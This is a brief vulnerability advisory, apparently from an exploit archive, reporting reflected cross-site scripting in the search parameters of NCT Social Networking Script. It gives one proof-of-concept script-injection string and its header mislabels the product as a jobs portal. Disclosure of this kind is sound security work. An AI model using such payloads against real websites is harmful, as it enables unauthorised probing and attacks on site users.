NCT Social Networking Script suffers from a cross site scripting vulnerability.
bc4284087fea64249e62380695b28ab270afe6ce2f35a6604a43b7b3dae77ec1# Exploit Title: XSS in NCT Jobs Portal Script
# Date: 25-apr-2010
# Author: Sid3^effects
# Software Link: N/a
# CVE : []
# Code : []
------------------------------------------------------------------------
XSS in NCT Social Networking Script
Vendor:http://www.ncrypted.net/
----------------------Author:Sid3^effects-------------------------------
Description :
A modular, highly customizable social networking script
With 100% copyright to you.
NCT Social is a social utility script which provides rapid and high quality script for building custom web applications with deep integration for social networking features. If you think that the community could enhance the core valuation of your product, or if it's the community itself that you want to engage, go for NCT Social and get a modular, highly customizable social networking script.
---------------------------------------------------------------------------
* XSS (cross site scripting )
XSS is also found in the search field (search.php=)
Parameter Name: Keywords or Tags or Desired City
Parameter Type: Querystring
Attack Pattern: '"--><script>alert(0x000872)</script>
---------------------------------------------------------------------------
ShoutZ :
-------
---Indian Cyber warriors--Andhra hackers--
Greetz :
--------
=--*L0rd ÇrusAdêr*---d4rk-blu™® [ICW]---R45C4L idi0th4ck3r---CR4C|< 008---M4n0j--Mayur--=
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed